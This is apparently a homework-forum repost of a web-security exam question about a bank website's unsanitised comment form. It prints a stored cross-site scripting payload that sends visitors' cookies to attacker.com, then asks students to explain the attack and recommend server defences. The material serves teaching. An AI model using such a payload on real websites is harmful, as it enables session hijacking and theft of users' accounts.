b. The website at www.republic.com allows users to submit comments on the republic's bank performance using a form. An a
-
answerhappygod
- Site Admin
- Posts: 899604
- Joined: Mon Aug 02, 2021 8:13 am
b. The website at www.republic.com allows users to submit comments on the republic's bank performance using a form. An a
b. The website at www.republic.com allows users to submit comments on the republic's bank performance using a form. An attacker, who controls the webserver at http://attacker.com, enters the comment below. Republic website does NOT sanitize the comment. <script>document.location="http://attacker.com/copyfiles.php?cookie=" + document.cookie;"</script> <b> I really love republic bank! </b> This attack involves a cookie. Whose cookie is it? What is happening to the cookie? Why is this disturbing? [5 marks) c. Describe three actions you would recommend to Republic Bank for securing its web server and Web applications? [6 marks]
Join a community of subject matter experts. Register for FREE to view solutions, replies, and use search function. Request answer by replying!